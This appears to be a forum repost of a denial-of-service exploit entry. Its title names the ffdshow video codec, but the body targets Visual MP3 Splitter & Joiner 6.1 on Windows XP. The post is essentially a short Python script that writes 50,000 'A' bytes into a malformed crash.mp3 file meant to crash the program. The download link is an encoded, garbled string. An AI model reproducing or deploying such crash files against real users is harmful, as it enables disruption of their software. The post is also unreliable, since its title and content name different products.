首页
社区
课程
招聘
[转帖]ffdshow Video Codec Denial of Service Vulnerability
发表于: 2010-8-10 07:59 3750

[转帖]ffdshow Video Codec Denial of Service Vulnerability

2010-8-10 07:59
3750
# Exploit Title: Visual MP3 Splitter & Joiner 6.1 (.mp3 , .wav) DoS  

# Date: 9 / 8 / 2010  

# Author: Oh Yaw Theng  

# Software Link: 291K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2S2L8X3W2S2j5%4c8G2L8$3I4K6i4K6u0W2j5$3!0E0i4K6u0r3M7$3!0X3N6q4)9J5c8X3#2H3x3#2)9J5k6s2y4H3L8r3W2@1N6r3g2J5i4K6u0V1K9X3!0A6L8X3g2J5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2K6K9s2c8E0L8q4)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7

# Version: 6.1  

# Tested on: Windows XP SP 2  

# CVE : N /A  

   

#!/usr/bin/python  

   

# User needs to change the following extension with the one mentioned above  

filename = "crash.mp3"

   

junk = "\x41" * 50000

   

exploit = junk  

   

textfile = open(filename,'w')  

textfile.write(exploit)  

textfile.close()

[培训]科锐软件逆向54期预科班、正式班开始火爆招生报名啦!!!

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回